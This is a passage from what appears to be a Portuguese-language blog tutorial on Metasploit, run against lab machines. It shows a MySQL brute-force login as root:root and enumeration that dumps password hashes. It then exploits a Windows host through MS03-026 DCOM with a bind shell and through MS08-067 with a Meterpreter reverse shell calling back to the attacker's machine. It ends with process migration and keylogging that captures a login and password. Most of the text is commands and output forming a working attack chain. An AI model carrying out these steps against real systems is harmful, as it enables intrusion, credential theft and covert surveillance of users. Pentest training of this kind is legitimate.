No exemplo anterior, utilizamos o m\u00f3dulo auxiliar<\/p>\n
auxiliary\/scanner\/mysql\/mysql_login, setamos o m\u00e9todo for\u00e7a bruta, host alvo
\n192.168.1.108, a\u00e7\u00f5es concorrentes no valor de 30 e por final “chutamos” uma senha
\npadr\u00e3o comumente utilizada no usu\u00e1rio MySQl , neste caso root, ap\u00f3s executamos com<\/p>\n
o comando run. o RESULTADO : SUCCESSFUL LOGIN ‘root’ : ‘root’<\/p>\n
Ap\u00f3s o sucesso em nossa investida, podemos progredir no terreno:<\/p>\n
msf > use auxiliary\/admin\/mysql\/mysql_enum\nmsf auxiliary(mysql_enum) > set RHOST 192.168.1.108\nRHOST => 192.168.1.108\nmsf auxiliary(mysql_enum) > set PASSWORD root\nPASSWORD => root\nmsf auxiliary(mysql_enum) > set USERNAME root\nUSERNAME => root\nmsf auxiliary(mysql_enum) > run\n\n\n[*] Running MySQL Enumerator...\n[*] Enumerating Parameters\n[*] MySQL Version: 5.0.51a-3ubuntu5\n[*] Compiled for the following OS: debian-linux-gnu\n[*] Architecture: i486\n[*] Server Hostname: metasploitable\n[*] Data Directory: \/var\/lib\/mysql\/\n[*] Logging of queries and logins: OFF\n[*] Old Password Hashing Algorithm OFF\n[*] Loading of local files: ON\n[*] Logins with old Pre-4.1 Passwords: OFF\n[*] Allow Use of symlinks for Database Files: YES\n[*] Allow Table Merge: YES\n[*] SSL Connections: Enabled\n[*] SSL CA Certificate: \/etc\/mysql\/cacert.pem\n[*] SSL Key: \/etc\/mysql\/server-key.pem\n[*] SSL Certificate: \/etc\/mysql\/server-cert.pem\n[*] Enumerating Accounts:\n[*] List of Accounts with Password Hashes:\n[*] User: root Host: localhost Password Hash: \n\n*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B\n[*] User: root Host: ubuntu804-base Password Hash: \n\n*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B\n[*] User: root Host: 127.0.0.1 Password Hash: \n\n*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B\n[*] User: Host: localhost Password Hash:\n[*] User: Host: ubuntu804-base Password Hash:\n[*] User: debian-sys-maint Host: localhost Password Hash: \n\n*E07F0A7CCC0044345116513C989F45663C1F8347\n[*] User: root Host: % Password Hash: \n\n*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B\n[*] The following users have GRANT Privilege:\n[*] User: root Host: localhost\n[*] User: root Host: ubuntu804-base\n[*] User: root Host: 127.0.0.1\n[*] User: debian-sys-maint Host: localhost\n[*] User: root Host: %\n[*] The following users have CREATE USER Privilege:\n[*] User: root Host: localhost\n[*] User: root Host: ubuntu804-base\n[*] User: root Host: 127.0.0.1\n[*] User: root Host: %\n[*] The following users have RELOAD Privilege:\n[*] User: root Host: localhost\n[*] User: root Host: ubuntu804-base\n[*] User: root Host: 127.0.0.1\n[*] User: debian-sys-maint Host: localhost\n[*] User: root Host: %\n[*] The following users have SHUTDOWN Privilege:\n[*] User: root Host: localhost\n[*] User: root Host: ubuntu804-base\n[*] User: root Host: 127.0.0.1\n[*] User: debian-sys-maint Host: localhost\n[*] User: root Host: %\n[*] The following users have SUPER Privilege:\n[*] User: root Host: localhost\n[*] User: root Host: ubuntu804-base\n[*] User: root Host: 127.0.0.1\n[*] User: debian-sys-maint Host: localhost\n[*] User: root Host: %\n[*] The following users have FILE Privilege:\n[*] User: root Host: localhost\n[*] User: root Host: ubuntu804-base\n[*] User: root Host: 127.0.0.1\n[*] User: debian-sys-maint Host: localhost\n[*] User: root Host: %\n[*] The following users have PROCESS Privilege:\n[*] User: root Host: localhost\n[*] User: root Host: ubuntu804-base\n[*] User: root Host: 127.0.0.1\n[*] User: debian-sys-maint Host: localhost\n[*] User: root Host: %\n[*] The following accounts have privileges to the mysql database:\n[*] User: root Host: localhost\n[*] User: root Host: ubuntu804-base\n[*] User: root Host: 127.0.0.1\n[*] User: debian-sys-maint Host: localhost\n[*] User: root Host: %\n[*] Anonymous Accounts are Present:\n[*] User: Host: localhost\n[*] User: Host: ubuntu804-base\n[*] The following accounts have empty passwords:\n[*] User: Host: localhost\n[*] User: Host: ubuntu804-base\n[*] The following accounts are not restricted by source:\n[*] User: root Host: %\n[*] Auxiliary module execution completed\n\n<\/pre>\nAgora com o m\u00f3dulo mysql_sql, podemos verificar os esquemas das bases de dados:<\/p>\n
msf > use auxiliary\/admin\/mysql\/mysql_sql\nmsf auxiliary(mysql_sql) > set USER root\nUSER => root\nmsf auxiliary(mysql_sql) > set PASSWORD root\nPASSWORD => root\nmsf auxiliary(mysql_sql) > set RHOST 192.168.1.108\nRHOST => 192.168.1.108\nmsf auxiliary(mysql_sql) > set SQL show databases\nSQL => show databases\nmsf auxiliary(mysql_sql) > set PORT 3306\nPORT => 3306\nmsf auxiliary(mysql_sql) > run\n\n\n[*] Sending statement: 'show databases'...\n[*] | information_schema |\n[*] | mysql |\n[*] | tikiwiki |\n[*] | tikiwiki195 |\n[*] Auxiliary module execution completed\n<\/pre>\nNosso pr\u00f3ximo passo ser\u00e1 o ataque de sistemas vulneraveis RPC.<\/p>\n
msf > nmap -sS 192.168.1.101\n[*] exec: nmap -sS 192.168.1.101\n\n\nStarting Nmap 5.51SVN ( http:\/\/nmap.org ) at 2012-08-10 12:39 BRT\nNmap scan report for 192.168.1.101\nHost is up (0.00039s latency).\nNot shown: 995 closed ports\nPORT STATE SERVICE\n135\/tcp open msrpc\n139\/tcp open netbios-ssn\n445\/tcp open microsoft-ds\n1025\/tcp open NFS-or-IIS\n1026\/tcp open LSA-or-nterm\nMAC Address: 00:0C:29:7D:B7:84 (VMware)\n\nNmap done: 1 IP address (1 host up) scanned in 0.69 seconds\n\n<\/pre>\nRepare acima, nosso alvo possui a porta 135 na escuta, vamos pesquisar exploits
\npara execu\u00e7\u00e3o do ataque de vulnerabilidade RPC dcom<\/p>\n
msf > search dcom\n\nMatching Modules\n================\n\n Name Disclosure Date Rank Description\n ---- --------------- ---- -----------\n exploit\/windows\/dcerpc\/ms03_026_dcom 2003-07-16 great Microsoft \n\nRPC DCOM Interface Overflow\n exploit\/windows\/driver\/broadcom_wifi_ssid 2006-11-11 low Broadcom \n\nWireless Driver Probe Response SSID Overflow\n exploit\/windows\/smb\/ms04_031_netdde 2004-10-12 good Microsoft \n\nNetDDE Service Overflow\n\n<\/pre>\nVamos utilizar exploit\/windows\/dcerpc\/ms03_026_dcom<\/p>\n
msf > use exploit\/windows\/dcerpc\/ms03_026_dcom\nmsf exploit(ms03_026_dcom) > show options\n\nModule options (exploit\/windows\/dcerpc\/ms03_026_dcom):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n RHOST yes The target address\n RPORT 135 yes The target port\n\n\nExploit target:\n\n Id Name\n -- ----\n 0 Windows NT SP3-6a\/2000\/XP\/2003 Universal\n\n\nmsf exploit(ms03_026_dcom) > set RHOST 192.168.1.101\nRHOST => 192.168.1.101\nmsf exploit(ms03_026_dcom) > set RPORT 135\nRPORT => 135\nmsf exploit(ms03_026_dcom) > set PAYLOAD generic\/shell_bind_tcp\nPAYLOAD => generic\/shell_bind_tcp\nmsf exploit(ms03_026_dcom) > exploit\n\n[*] Started bind handler\n[*] Trying target Windows NT SP3-6a\/2000\/XP\/2003 Universal...\n[*] Binding to 4d9f4ab8-7d1c-11cf-861e-\n\n0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.101[135] ...\n[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.101\n\n[135] ...\n[*] Sending exploit ...\n[*] Command shell session 1 opened (192.168.1.109:38144 -> 192.168.1.101:4444) at \n\n2012-08-10 12:46:18 -0300\n\nMicrosoft Windows [vers\u00c6o 5.2.3790]\n(C) Copyright 1985-2003 Microsoft Corp.\n\nC:\\WINDOWS\\system32>\n\n\n<\/pre>\nBem, podemos verificar acima que mais uma vez obtivemos sucesso em nossa<\/p>\n
investida. A seguir utilizaremos o meterpreter para comprometimento do alvo
\ne captura de teclas.<\/p>\n
msf > use exploit\/windows\/smb\/ms08_067_netapi\nmsf exploit(ms08_067_netapi) > set RHOST 192.168.1.107\nRHOST => 192.168.1.107\nmsf exploit(ms08_067_netapi) > set LHOST 192.168.1.109\nLHOST => 192.168.1.109\nmsf exploit(ms08_067_netapi) > set PAYLOAD windows\/meterpreter\/reverse_tcp\nPAYLOAD => windows\/meterpreter\/reverse_tcp\nmsf exploit(ms08_067_netapi) > exploit\n\n[*] Started reverse handler on 192.168.1.109:4444\n[*] Automatically detecting the target...\n[*] Fingerprint: Windows XP - Service Pack 3 - lang:English\n[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)\n[*] Attempting to trigger the vulnerability...\n[*] Sending stage (752128 bytes) to 192.168.1.107\n[*] Meterpreter session 2 opened (192.168.1.109:4444 -> 192.168.1.107:1047) at 2012-08-10 12:57:24 -0300\n\n<\/pre>\nNosso alvo foi comprometido, ent\u00e3o agora podemos excutar os comandos para captura de teclas Keylogging, o primeiro passo e analisar os processos, ap\u00f3s migrar o
\nprocesso escolhido e depois capturar os dados:<\/p>\n
meterpreter > ps\n\nProcess list\n============\n\nPID Name Arch Session User Path\n --- ---- ---- ------- ---- ----\n 0 [System Process]\n 4 System x86 0 NT AUTHORITY\\SYSTEM\n 416 wscntfy.exe x86 0 WHITEHAT-E8A438\\cobaia C:\\WINDOWS\\system32\\wscntfy.exe\n 496 smss.exe x86 0 NT AUTHORITY\\SYSTEM \\SystemRoot\\System32\\smss.exe\n 528 vmtoolsd.exe x86 0 NT AUTHORITY\\SYSTEM C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\n 568 svchost.exe x86 0 NT AUTHORITY\\SYSTEM C:\\WINDOWS\\System32\\svchost.exe\n 604 csrss.exe x86 0 NT AUTHORITY\\SYSTEM \\??\\C:\\WINDOWS\\system32\\csrss.exe\n 628 winlogon.exe x86 0 NT AUTHORITY\\SYSTEM \\??\\C:\\WINDOWS\\system32\\winlogon.exe\n 672 services.exe x86 0 NT AUTHORITY\\SYSTEM C:\\WINDOWS\\system32\\services.exe\n 684 lsass.exe x86 0 NT AUTHORITY\\SYSTEM C:\\WINDOWS\\system32\\lsass.exe\n 840 vmacthlp.exe x86 0 NT AUTHORITY\\SYSTEM C:\\Program Files\\VMware\\VMware Tools\\vmacthlp.exe\n 856 svchost.exe x86 0 NT AUTHORITY\\SYSTEM C:\\WINDOWS\\system32\\svchost.exe\n 936 svchost.exe x86 0 NT AUTHORITY\\NETWORK SERVICE C:\\WINDOWS\\system32\\svchost.exe\n 1032 svchost.exe x86 0 NT AUTHORITY\\SYSTEM C:\\WINDOWS\\System32\\svchost.exe\n 1092 svchost.exe x86 0 NT AUTHORITY\\NETWORK SERVICE C:\\WINDOWS\\system32\\svchost.exe\n 1148 svchost.exe x86 0 NT AUTHORITY\\LOCAL SERVICE C:\\WINDOWS\\system32\\svchost.exe\n 1256 logon.scr x86 0 WHITEHAT-E8A438\\cobaia C:\\WINDOWS\\System32\\logon.scr\n 1356 TPAutoConnSvc.exe x86 0 NT AUTHORITY\\SYSTEM C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe\n 1524 spoolsv.exe x86 0 NT AUTHORITY\\SYSTEM C:\\WINDOWS\\system32\\spoolsv.exe\n 1544 explorer.exe x86 0 WHITEHAT-E8A438\\cobaia C:\\WINDOWS\\Explorer.EXE\n 1640 alg.exe x86 0 NT AUTHORITY\\LOCAL SERVICE C:\\WINDOWS\\System32\\alg.exe\n 1676 VMwareTray.exe x86 0 WHITEHAT-E8A438\\cobaia C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\n 1684 vmtoolsd.exe x86 0 WHITEHAT-E8A438\\cobaia C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\n 1760 ctfmon.exe x86 0 WHITEHAT-E8A438\\cobaia C:\\WINDOWS\\system32\\ctfmon.exe\n 1840 cmd.exe x86 0 WHITEHAT-E8A438\\cobaia C:\\WINDOWS\\system32\\cmd.exe\n 1892 TPAutoConnect.exe x86 0 WHITEHAT-E8A438\\cobaia C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnect.exe\n 2008 wuauclt.exe x86 0 WHITEHAT-E8A438\\cobaia C:\\WINDOWS\\system32\\wuauclt.exe\n\n\nmeterpreter > migrate 1544\n[*] Migrating to 1544...\n[*] Migration completed successfully.\n\nmeterpreter > keyscan_start\nStarting the keystroke sniffer...\nmeterpreter > keyscan_dump\nDumping captured keystrokes...\nwww.backtrack.com teste@teste.xxx senha123 \n\n<\/return><\/back><\/return><\/pre>\n\u00c9 isso ai !!! agora basta que o pentest utilize a criatividade .<\/p>\n\r\n\t\t
\r\n\t\t\t\r\n\t\t\t\t\r\n\t\t\t
\r\n\t\t\t